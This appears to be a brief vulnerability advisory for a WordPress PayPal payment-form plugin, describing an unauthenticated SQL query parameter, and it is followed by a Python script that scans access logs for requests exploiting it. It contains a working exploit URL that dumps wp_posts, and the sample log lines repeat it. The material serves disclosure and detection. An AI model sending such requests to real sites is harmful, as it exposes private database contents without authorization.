EPSS: 0.68 (Medium), Percentile: 98.0%
The ‘query’ parameter allowed any unauthenticated user to perform SQL queries, with the results output to a web page in JSON format.
https://example.com/?cffaction=get_data_from_database&query=SELECT%20*%20from%20wp_posts
plugins.trac.wordpress.org/changeset/2323857/payment-form-for-paypal-pro
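
A way to check web server access logs for requests matching the URL pattern above. This is an added example, not part of the original advisory or the plugin's code. The log lines are constructed samples in combined log format, and `find_hits` is a hypothetical name.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample log lines (combined log format, documentation IP ranges).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jan/2021:10:00:01 +0000] "GET /?cffaction=get_data_from_database&query=SELECT%20*%20from%20wp_posts HTTP/1.1" 200 5120 "-" "curl/7.68.0"
198.51.100.7 - - [10/Jan/2021:10:00:05 +0000] "GET /?p=12 HTTP/1.1" 200 8431 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Jan/2021:10:00:09 +0000] "GET /?query=select+*+from+wp_posts&cffaction=get_data_from_database HTTP/1.1" 200 5120 "-" "curl/7.68.0"
198.51.100.9 - - [10/Jan/2021:10:01:00 +0000] "GET /?cffaction=get_data_from_database HTTP/1.1" 200 20 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def find_hits(log_text):
    """Return requests that pass SQL through the plugin's 'query' parameter."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        # Parse the query string instead of substring-matching the raw line,
        # so parameter order and %20 / + encoding do not hide a request.
        params = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
        if "get_data_from_database" not in params.get("cffaction", []):
            continue
        queries = params.get("query", [])
        if not queries:
            continue  # action requested, but no SQL was supplied
        hits.append({
            "ip": m["ip"],
            "time": m["ts"],
            "status": int(m["status"]),  # a 200 means a response was served
            "sql": queries[0],           # decoded SQL text, for triage
        })
    return hits

if __name__ == "__main__":
    for hit in find_hits(SAMPLE_LOG):
        print(hit)
```
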